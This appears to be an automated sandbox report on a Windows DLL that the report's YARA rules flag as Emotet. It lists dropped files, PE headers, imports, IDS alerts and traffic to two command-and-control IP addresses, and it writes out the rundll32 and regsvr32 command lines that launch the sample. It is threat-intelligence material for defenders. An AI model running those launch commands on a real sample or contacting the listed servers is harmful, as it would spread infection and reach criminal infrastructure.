Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.0977650710616285
Encrypted:	false
SSDEEP:	6:kK8k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:E9kPlE99SNxAhUeYlUSA/t
MD5:	92EA2BF893C01FECAF88971729F04467
SHA1:	BA9515C108D2C4B101CD8217CD30E2DBFA557CC6
SHA-256:	6804AA30DEFE7C14FE33501BA5A76C27DD0ED9633C6DDBC5B7004B37E43D1BE3
SHA-512:	5763CCE079687D1E512F74C67E5BDA1E8B9365865548406DBDB09DE00718660A2F614494CC0468408365782063E0032FA808E679E50346A1AB39DFE9CE325FEA
Malicious:	false
Preview:	p...... ........h. .w...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	7250
Entropy (8bit):	3.1658683248753263
Encrypted:	false
SSDEEP:	96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTE5+Abg:cY+38+DJc+iGr+MZ+65+6tg+ECO+5
MD5:	EF4A738F9534F21AD28054EBE4A48DFE
SHA1:	EB61A050285D3D7F0C9D7B12AB89393B79726AF5
SHA-256:	6AA3D787A7545C8162781DCB025E23C280B3D37B7FD62438C17B624E5088D1E1
SHA-512:	D28E52070FB69539D49F08E65D7D1E44159ED924DFC8DA0FAF8281CE551B17A2A24316072341E8212F79916E351B85F318DB9C0E72174A450276C51417BFD584
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_185158_945.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.7696639382117034
Encrypted:	false
SSDEEP:	96:bQCn6CKbo+yh5Kt9A/YNbCBkI2lgRkni4swT22jFz4NMCldJRfuKj5QNMCZY5XU5:PI1mvx2gvOC5FCeC0CTCECo
MD5:	960DC335D5874DEED58AED46351578D7
SHA1:	8A91C73DE78B0277871C742A93F527DE746B248E
SHA-256:	129E447D9FD9333FF2177EE47F697A1975898712C51A510FFE901DA5599FAE39
SHA-512:	7F5A7743699EDC81BCA5E498EC5483ABF29E25DD612B2AB892C1F54DA0A5272C99492C43688B9A5B6978538D98CF9133D5B1EF9D81FC5B57AA7856682DFB1542
Malicious:	false
Preview:	.... ... ....................................... ...!...........................\...\|............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .......5.w...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.4._.1.8.5.1.5.8._.9.4.5...e.t.l.........P.P.\...\|...........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.08795155067448
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 95.65% Win32 EXE PECompact compressed (generic) (41571/9) 3.97% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	M2hsMd9hTq.dll
File size:	417792
MD5:	707ec8851adeff69bdb3204692c340a8
SHA1:	b51315290d9b490c55663a572bd85999f3267b7a
SHA256:	a6d1ed377e3de0ae885c14ca65c2eafba01207e058ac353289182800a95b5fea
SHA512:	fb147536a13895d60fd3fdf50507a7115a910ac6c9e7e8e36d602f5e51e8b56cec67b201003053ec5ad79cd3d342a7e62c455eef00ac067a119f7bdc6fd6ef5d
SSDEEP:	6144:o1ju3jPam65ucnNgDoDUhuGGwKveu04VKYjHyCAJOhrmBlDxqms9ujAJKedmL/:yMjcuDaUImuStJorohvsMjmKe
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z'...F...F...F...I...F...I...F...F...D..9....F..9....F..9....F..9....F..9....F..9....F..Rich.F..................PE..L...k+.a...

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x10017b85
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x61E02B6B [Thu Jan 13 13:38:51 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	90add561a8bf6976696c056c199a41b8

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007EFE78D08F37h
call 00007EFE78D10CB8h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007EFE78D08E22h
pop ecx
retn 000Ch
push 00000000h
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
call 00007EFE78D10D20h
add esp, 14h
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x313c0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2fdcc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x3664	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x61000	0x3df4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cd60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x29000	0x440	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2fd44	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27f5e	0x28000	False	0.514996337891	data	6.66251942868	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x29000	0x8410	0x9000	False	0.308865017361	data	4.82995734739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x32000	0x2a9a0	0x27000	False	0.963572966747	data	7.93281036967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x5d000	0x3664	0x4000	False	0.274780273438	data	4.49622273105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x61000	0x8284	0x9000	False	0.33251953125	data	3.82081999119	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x5db08	0x134	data	Chinese	China
RT_CURSOR	0x5dc3c	0xb4	data	Chinese	China
RT_CURSOR	0x5dcf0	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x5de24	0x134	data	Chinese	China
RT_CURSOR	0x5df58	0x134	data	Chinese	China
RT_CURSOR	0x5e08c	0x134	data	Chinese	China
RT_CURSOR	0x5e1c0	0x134	data	Chinese	China
RT_CURSOR	0x5e2f4	0x134	data	Chinese	China
RT_CURSOR	0x5e428	0x134	data	Chinese	China
RT_CURSOR	0x5e55c	0x134	data	Chinese	China
RT_CURSOR	0x5e690	0x134	data	Chinese	China
RT_CURSOR	0x5e7c4	0x134	data	Chinese	China
RT_CURSOR	0x5e8f8	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x5ea2c	0x134	data	Chinese	China
RT_CURSOR	0x5eb60	0x134	data	Chinese	China
RT_CURSOR	0x5ec94	0x134	data	Chinese	China
RT_BITMAP	0x5edc8	0xb8	data	Chinese	China
RT_BITMAP	0x5ee80	0x144	data	Chinese	China
RT_ICON	0x5efc4	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Chinese	China
RT_ICON	0x5f2ac	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x5f3d4	0x33c	data	Chinese	China
RT_DIALOG	0x5f710	0xe2	data	Chinese	China
RT_DIALOG	0x5f7f4	0x34	data	Chinese	China
RT_STRING	0x5f828	0x54	data	Chinese	China
RT_STRING	0x5f87c	0x2c	data	Chinese	China
RT_STRING	0x5f8a8	0x82	data	Chinese	China
RT_STRING	0x5f92c	0x1d0	data	Chinese	China
RT_STRING	0x5fafc	0x164	data	Chinese	China
RT_STRING	0x5fc60	0x132	data	Chinese	China
RT_STRING	0x5fd94	0x50	data	Chinese	China
RT_STRING	0x5fde4	0x40	data	Chinese	China
RT_STRING	0x5fe24	0x6a	data	Chinese	China
RT_STRING	0x5fe90	0x1d6	data	Chinese	China
RT_STRING	0x60068	0x110	data	Chinese	China
RT_STRING	0x60178	0x24	data	Chinese	China
RT_STRING	0x6019c	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x601cc	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x601f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60204	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60218	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x6022c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60240	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60254	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60268	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x6027c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60290	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602a4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602b8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602cc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602e0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602f4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x60308	0x22	data	Chinese	China
RT_VERSION	0x6032c	0x2e0	data	Chinese	China
RT_MANIFEST	0x6060c	0x56	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileA, GetCPInfo, GetOEMCP, RtlUnwind, HeapReAlloc, GetCommandLineA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringW, GetStdHandle, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCurrentProcess, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, InterlockedDecrement, FreeResource, GetCurrentProcessId, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, lstrcmpA, GlobalDeleteAtom, GetModuleHandleA, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, CreateThread, CloseHandle, HeapFree, GetNativeSystemInfo, GetProcessHeap, HeapAlloc, FreeLibrary, GetProcAddress, LoadLibraryA, IsBadReadPtr, VirtualProtect, SetLastError, VirtualAlloc, VirtualFree, VirtualQuery, Sleep, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, MultiByteToWideChar, GetVersion, LCMapStringA, InterlockedExchange
USER32.dll	LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, GetMessageTime, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, UnhookWindowsHookEx, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, DestroyMenu, UnregisterClassA, GetMessagePos, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem, CheckMenuItem, PostQuitMessage, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, SetTimer, KillTimer, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, ShowWindow, EnableWindow, LoadIconA, PostMessageA, AdjustWindowRectEx
GDI32.dll	SetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
SHLWAPI.dll	PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WS2_32.dll	sendto, recvfrom, WSAStartup, inet_addr, htons, socket, bind, setsockopt, WSACleanup, closesocket, htonl

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10008af0

Version Infos

Description	Data
LegalCopyright	(C) 2014
InternalName	UDPTool
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	UDPTool
ProductVersion	1, 0, 0, 1
FileDescription	UDPTool Microsoft
OriginalFilename	UDPTool.EXE
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-10:51:56.333232	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49758	80	192.168.2.5	45.138.98.34
01/14/22-10:51:57.530904	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49759	8080	192.168.2.5	69.16.218.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 10:51:56.333231926 CET	49758	80	192.168.2.5	45.138.98.34
Jan 14, 2022 10:51:56.352993011 CET	80	49758	45.138.98.34	192.168.2.5
Jan 14, 2022 10:51:56.892113924 CET	49758	80	192.168.2.5	45.138.98.34
Jan 14, 2022 10:51:56.909033060 CET	80	49758	45.138.98.34	192.168.2.5
Jan 14, 2022 10:51:57.501562119 CET	49758	80	192.168.2.5	45.138.98.34
Jan 14, 2022 10:51:57.520227909 CET	80	49758	45.138.98.34	192.168.2.5
Jan 14, 2022 10:51:57.530904055 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:51:57.659617901 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:51:57.659778118 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:51:57.688545942 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:51:57.817223072 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:51:57.830322981 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:51:57.830349922 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:51:57.830404043 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:51:57.830427885 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:52:00.718591928 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:52:00.847300053 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:52:00.848001957 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:52:00.848105907 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:52:00.855631113 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:52:00.984343052 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:52:01.490227938 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:52:01.490308046 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:52:04.489005089 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:52:04.489027977 CET	8080	49759	69.16.218.101	192.168.2.5
Jan 14, 2022 10:52:04.489170074 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:52:04.489233017 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:53:46.642934084 CET	49759	8080	192.168.2.5	69.16.218.101
Jan 14, 2022 10:53:46.642968893 CET	49759	8080	192.168.2.5	69.16.218.101

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 328 Parent PID: 6136

General

Start time:	10:51:37
Start date:	14/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll"
Imagebase:	0xe10000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5872 Parent PID: 328

General

Start time:	10:51:37
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2512 Parent PID: 328

General

Start time:	10:51:38
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\M2hsMd9hTq.dll
Imagebase:	0x200000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.247153008.00000000026D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4892 Parent PID: 5872

General

Start time:	10:51:38
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1
Imagebase:	0x280000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.247708165.0000000004ED0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4940 Parent PID: 328

General

Start time:	10:51:38
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\M2hsMd9hTq.dll,DllRegisterServer
Imagebase:	0x280000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
